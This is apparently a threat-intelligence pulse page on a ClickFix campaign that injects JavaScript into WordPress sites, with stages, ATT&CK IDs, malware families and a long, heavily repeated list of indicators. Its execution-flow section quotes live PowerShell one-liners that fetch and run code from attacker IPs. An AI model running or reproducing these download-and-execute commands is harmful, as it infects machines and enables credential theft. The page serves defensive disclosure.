Pulse Detail — Threat Intelligence

PULSE NAME

ClickFix / Shadow DOM JS Injection Campaign — Multi-stage infostealer chain targeting WordPress sites

WHITE dispensight 2026-05-13 Modified: 2026-05-20

191

IOCs

HIGH VOLUME

Observed Execution Flow: Stage 1: Initial Access via Browser ---> Clickfix Stage 2: Obfuscated PowerShell Execution ``` Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null ``` Stage 3: Secondary Payload Download A child PowerShell process (PID 4908) spawned by PID 7408 executes: ``` Invoke-WebRequest -Uri "http://158.94.208.92" -UseBasicParsing Invoke-Expression $checkResult.Content ``` Stage 4: Code Compilation and Injection (csc.exe) Stage 5: Payload Execution in svchost.exe & self-deletion when finished Stage 6: Network Communication -> Suricata IDS detects DonutLoader requesting additional payloads from 158.94.208.104:80 Detailed description available at https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf

MITRE ATT&CK & Malware Families

ATT&CK TECHNIQUES

T1553.002 T1082 T1059.007 T1055.001 T1055.013 T1189 T1140 T1027.001 T1566.002 T1106 T1218.004 T1608.002 T1218.011 T1555.003 T1540 T1564.003 T1497.001 T1012 T1203 T1539 T1531 T1059.005 T1027 T1059.001 T1485

MALWARE FAMILIES

Donutloader TR/Rozena.Gen

Indicators of Compromise (191)

All IPv4 URL domain hostname FileHash-MD5 FileHash-SHA1 FileHash-SHA256

TYPE	INDICATOR	DESCRIPTION	CREATED
IPv4	158.94.208.104	CC=GB ASN=AS786 jisc services limited	2026-05-13
IPv4	158.94.208.92	CC=GB ASN=AS786 jisc services limited	2026-05-13
IPv4	178.16.52.232	CC=DE ASN=AS40999 dus.net gmbh	2026-05-13
URL	http://158.94.208.92	—	2026-05-13
URL	http://ntdnewtds.shop/jsrepo?rnd=	—	2026-05-13
domain	dnsnewtds.shop	—	2026-05-13
domain	gettrumpmemestrendingtokens.com	—	2026-05-13
domain	ntdnewtds.shop	—	2026-05-13
URL	http://www.dnsnewtds.shop/	—	2026-05-13
URL	https://dnsnewtds.shop/...	—	2026-05-13
URL	https://www.dnsnewtds.shop/	—	2026-05-13
domain	caravan-crm-lu.com	—	2026-05-13
hostname	blksssd.ydns.eu	—	2026-05-13
domain	kamisisterbrofanydodf.com	—	2026-05-13
URL	http://158.94.208.104/x7GkP2mQ9zL4/	—	2026-05-13
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin	—	2026-05-13
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin	—	2026-05-13
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_s.bin	—	2026-05-13
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_downloader.bin	—	2026-05-13
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin	—	2026-05-13
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin	—	2026-05-13
hostname	gettrumpmemes.gettrumpmemestrendingtokens.com	—	2026-05-13
URL	https://gettrumpmemes.gettrumpmemestrendingtokens.com/	—	2026-05-13
URL	https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/*	—	2026-05-13
URL	https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/1389676a4641ef8e3b4790cf06063249d411a692.svg	—	2026-05-13
URL	https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/39676ea0b0640b4db29d0f93845d702b3784985a.svg	—	2026-05-13
URL	https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/750146d79df2f7e02b6895527d982b4de952ab94.svg	—	2026-05-13
URL	https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/ca03486f14ec38cd5ed6377fe6f56c1a5713a44a.svg	—	2026-05-13
URL	https://ntdnewtds.shop/jsrepo	—	2026-05-13
URL	https://ntdnewtds.shop/jsrepo/	—	2026-05-13
URL	http://www.kamisisterbrofanydodf.com/	—	2026-05-13
URL	https://www.kamisisterbrofanydodf.com/	—	2026-05-13
FileHash-MD5	51b46342163ef37f5f41c269ffb337d3	MD5 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810	2026-05-17
FileHash-MD5	7c268bfab0653cdca45b4dc3c1ee0092	MD5 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9	2026-05-17
FileHash-SHA1	724a8445c5c3fd57778d82f62b9d4a6112a3bb2d	SHA1 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810	2026-05-17
FileHash-SHA1	f1542a7697e04865e1dfeeed084e5ea5870100f0	SHA1 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9	2026-05-17
FileHash-SHA256	2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810	—	2026-05-17
FileHash-SHA256	2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896	—	2026-05-17
FileHash-SHA256	6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d	—	2026-05-17
FileHash-SHA256	88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9	—	2026-05-17
FileHash-MD5	51b46342163ef37f5f41c269ffb337d3	MD5 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810	2026-05-17
FileHash-MD5	7c268bfab0653cdca45b4dc3c1ee0092	MD5 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9	2026-05-17
FileHash-SHA1	724a8445c5c3fd57778d82f62b9d4a6112a3bb2d	SHA1 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810	2026-05-17
FileHash-SHA1	f1542a7697e04865e1dfeeed084e5ea5870100f0	SHA1 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9	2026-05-17
FileHash-SHA256	2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810	—	2026-05-17
FileHash-SHA256	2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896	—	2026-05-17
FileHash-SHA256	6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d	—	2026-05-17
FileHash-SHA256	88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9	—	2026-05-17
URL	https://3004.filemail.com/api/file/get?filekey=SfG1eQcm_8_zdIesRkVjDKsLLPGn3bfOiftAwlv4LtkdRlpJPaW4FoAJi5w	Execution chain: WScript.exe ? rundll32.exe (shell32.dll ShellExec_RunDLL) ? PowerShell (Base64-encoded, hidden window) ? downloads python312x64.zip (~14.5 MB) from https://3004.filemail.com/api/file/get?filekey=SfG1eQcm_8_zdIesRkVjDKsLLPGn3bfOiftAwlv4LtkdRlpJPaW4FoAJi5w ? extracts to %APPDATA%\Templates\python312x64\ ? executes pythonw.exe with Protected.py	2026-05-17
domain	captioto.com	Omegatech SC: Timestamp Prefix AS Path 2026-05-17 21:11:25 178.16.53.0/24 AS202412	2026-05-18
domain	cptoptious.com	Omegatech SC: Timestamp Prefix AS Path 2026-05-17 21:27:14 178.16.53.0/24 AS202412	2026-05-18
domain	newtdsone.shop	Omegatech SC: Timestamp Prefix AS Path 2026-05-17 21:43:04 178.16.53.0/24 AS202412 Domain reported to registrar 2026-05-17	2026-05-18
URL	https://cptoptious.com/jsrepo	—	2026-05-18
URL	https://cptoptious.com/automail-insurtech-tax.de	—	2026-05-18
URL	https://captioto.com/jsrepo	—	2026-05-18
URL	https://www.captioto.com/	—	2026-05-18
URL	http://www.captioto.com/	—	2026-05-18
URL	https://www.cptoptious.com/	—	2026-05-18
URL	https://cptoptious.com/url=	—	2026-05-18
URL	https://cptoptious.com/teamrepo	—	2026-05-18
URL	http://www.cptoptious.com/	—	2026-05-18
URL	http://cptoptious.com/jsrepo	—	2026-05-18
URL	http://cptoptious.com/captcha.html	—	2026-05-18
URL	http://cptoptious.com/captcha.htm	—	2026-05-18
URL	https://www.newtdsone.shop/	—	2026-05-18
URL	http://www.newtdsone.shop/	—	2026-05-18
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin	—	2026-05-18
IPv4	158.94.208.104	CC=GB ASN=AS786 jisc services limited	2026-05-18
IPv4	91.92.240.117	CC=BG ASN=AS34368 zonata - natskovi & sie ltd.	2026-05-18
IPv4	91.92.240.121	CC=BG ASN=AS34368 zonata - natskovi & sie ltd.	2026-05-18
URL	http://91.92.240.117/	—	2026-05-18
URL	http://91.92.240.121/	—	2026-05-18
URL	https://bryanexhaust.com/	—	2026-05-18
URL	https://sdntds.shop/teamrepo?rnd=0.3905751823084034&ts=1779127243826	—	2026-05-18
URL	https://sdntds.shop/teamrepo?rnd=0.5058000373016334	—	2026-05-18
domain	bryanexhaust.com	—	2026-05-18
domain	sdntds.shop	—	2026-05-18
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin	Secondary payload	2026-05-18
FileHash-MD5	c43c4bfd2e1a44ef690e6801be2b4099	collected from bryanexhaust.com	2026-05-18
FileHash-SHA256	4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5	Collected from bryanexhaust.com	2026-05-18
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin	—	2026-05-18
IPv4	178.16.53.137	CC=DE ASN=AS40999 dus.net gmbh	2026-05-18
FileHash-MD5	f17ba86cd4acff4ecfa2357c3b1d4b2c	—	2026-05-18
IPv4	158.94.208.104	CC=GB ASN=AS786 jisc services limited	2026-05-18
IPv4	91.92.240.117	CC=BG ASN=AS34368 zonata - natskovi & sie ltd.	2026-05-18
IPv4	91.92.240.121	CC=BG ASN=AS34368 zonata - natskovi & sie ltd.	2026-05-18
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin	—	2026-05-18
URL	http://91.92.240.117/	—	2026-05-18
URL	http://91.92.240.121/	—	2026-05-18
URL	https://dnsnewtds.shop/teamrepo?rnd=	—	2026-05-18
URL	https://ntdnewtds.shop/teamrepo?rnd=	—	2026-05-18
URL	https://sdntds.shop/teamrepo?rnd=	—	2026-05-18
domain	dnsnewtds.shop	—	2026-05-18
domain	ntdnewtds.shop	—	2026-05-18
domain	sdntds.shop	—	2026-05-18
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin	—	2026-05-18
IPv4	178.16.53.137	CC=DE ASN=AS40999 dus.net gmbh	2026-05-18
IPv4	158.94.208.104	CC=GB ASN=AS786 jisc services limited	2026-05-18
IPv4	91.92.240.117	CC=BG ASN=AS34368 zonata - natskovi & sie ltd.	2026-05-18
IPv4	91.92.240.121	CC=BG ASN=AS34368 zonata - natskovi & sie ltd.	2026-05-18
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin	—	2026-05-18
URL	http://91.92.240.117/	—	2026-05-18
URL	http://91.92.240.121/	—	2026-05-18
URL	https://dnsnewtds.shop/teamrepo	—	2026-05-18
URL	https://ntdnewtds.shop/teamrepo	—	2026-05-18
URL	https://sdntds.shop/teamrepo	—	2026-05-18
domain	dnsnewtds.shop	—	2026-05-18
domain	ntdnewtds.shop	—	2026-05-18
domain	sdntds.shop	—	2026-05-18
IPv4	158.94.208.104	CC=GB ASN=AS786 jisc services limited	2026-05-18
IPv4	91.92.240.117	CC=BG ASN=AS34368 zonata - natskovi & sie ltd.	2026-05-18
IPv4	91.92.240.121	CC=BG ASN=AS34368 zonata - natskovi & sie ltd.	2026-05-18
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin	—	2026-05-18
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin	—	2026-05-18
URL	http://sdntds.shop/teamrepo]	—	2026-05-18
domain	sdntds.shop	—	2026-05-18
FileHash-MD5	f29926ae72794dde60ae1d57d97c5781	—	2026-05-19
FileHash-MD5	ff1d1a915f7a4a1df4a16e0dd2990241	—	2026-05-19
FileHash-SHA1	abc92bc7fcb91e4122ebe93c4ea0d35b0e5bbce5	—	2026-05-19
FileHash-SHA1	f7836ce43c5f137fdd793d37c0ad3c17ab4ec9f0	—	2026-05-19
FileHash-SHA256	b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937	—	2026-05-19
FileHash-SHA256	ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff	—	2026-05-19
IPv4	158.94.208.104	CC=GB ASN=AS786 jisc services limited	2026-05-19
IPv4	158.94.208.92	CC=GB ASN=AS786 jisc services limited	2026-05-19
IPv4	178.16.52.232	CC=DE ASN=AS40999 dus.net gmbh	2026-05-19
URL	http://158.94.208.104:80	—	2026-05-19
URL	http://158.94.208.92	—	2026-05-19
URL	http://ntdnewtds.shop/jsrepo?rnd=	—	2026-05-19
domain	dnsnewtds.shop	—	2026-05-19
domain	ntdnewtds.shop	—	2026-05-19
domain	obfuscator.io	—	2026-05-19
domain	caravan-crm-lu.com	—	2026-05-19
hostname	blksssd.ydns.eu	—	2026-05-19
domain	kamisisterbrofanydodf.com	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_s.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_downloader.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin	—	2026-05-19
FileHash-MD5	f29926ae72794dde60ae1d57d97c5781	—	2026-05-19
FileHash-MD5	ff1d1a915f7a4a1df4a16e0dd2990241	—	2026-05-19
FileHash-SHA1	abc92bc7fcb91e4122ebe93c4ea0d35b0e5bbce5	—	2026-05-19
FileHash-SHA1	f7836ce43c5f137fdd793d37c0ad3c17ab4ec9f0	—	2026-05-19
FileHash-SHA256	b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937	—	2026-05-19
FileHash-SHA256	ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff	—	2026-05-19
IPv4	158.94.208.104	CC=GB ASN=AS786 jisc services limited	2026-05-19
IPv4	158.94.208.92	CC=GB ASN=AS786 jisc services limited	2026-05-19
IPv4	178.16.52.232	CC=DE ASN=AS40999 dus.net gmbh	2026-05-19
URL	http://158.94.208.104:80	—	2026-05-19
URL	http://158.94.208.92	—	2026-05-19
URL	http://ntdnewtds.shop/jsrepo?rnd=	—	2026-05-19
domain	dnsnewtds.shop	—	2026-05-19
domain	ntdnewtds.shop	—	2026-05-19
domain	obfuscator.io	—	2026-05-19
domain	caravan-crm-lu.com	—	2026-05-19
hostname	blksssd.ydns.eu	—	2026-05-19
domain	kamisisterbrofanydodf.com	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_s.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_downloader.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin	—	2026-05-19
FileHash-MD5	f29926ae72794dde60ae1d57d97c5781	—	2026-05-19
FileHash-MD5	ff1d1a915f7a4a1df4a16e0dd2990241	—	2026-05-19
FileHash-SHA1	abc92bc7fcb91e4122ebe93c4ea0d35b0e5bbce5	—	2026-05-19
FileHash-SHA1	f7836ce43c5f137fdd793d37c0ad3c17ab4ec9f0	—	2026-05-19
FileHash-SHA256	b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937	—	2026-05-19
FileHash-SHA256	ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff	—	2026-05-19
IPv4	158.94.208.104	CC=GB ASN=AS786 jisc services limited	2026-05-19
IPv4	158.94.208.92	CC=GB ASN=AS786 jisc services limited	2026-05-19
IPv4	178.16.52.232	CC=DE ASN=AS40999 dus.net gmbh	2026-05-19
URL	http://158.94.208.104:80	—	2026-05-19
URL	http://158.94.208.92	—	2026-05-19
URL	http://ntdnewtds.shop/jsrepo?rnd=	—	2026-05-19
domain	dnsnewtds.shop	—	2026-05-19
domain	ntdnewtds.shop	—	2026-05-19
domain	obfuscator.io	—	2026-05-19
domain	caravan-crm-lu.com	—	2026-05-19
hostname	blksssd.ydns.eu	—	2026-05-19
domain	kamisisterbrofanydodf.com	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_downloader.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/my_s.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_downloader.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin	—	2026-05-19
URL	http://158.94.208.104/x7GkP2mQ9zL4/student_s.bin	—	2026-05-19

References (3)

↗ SecureLeaf-ADV-2026-WP-001.pdf ↗ https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf ↗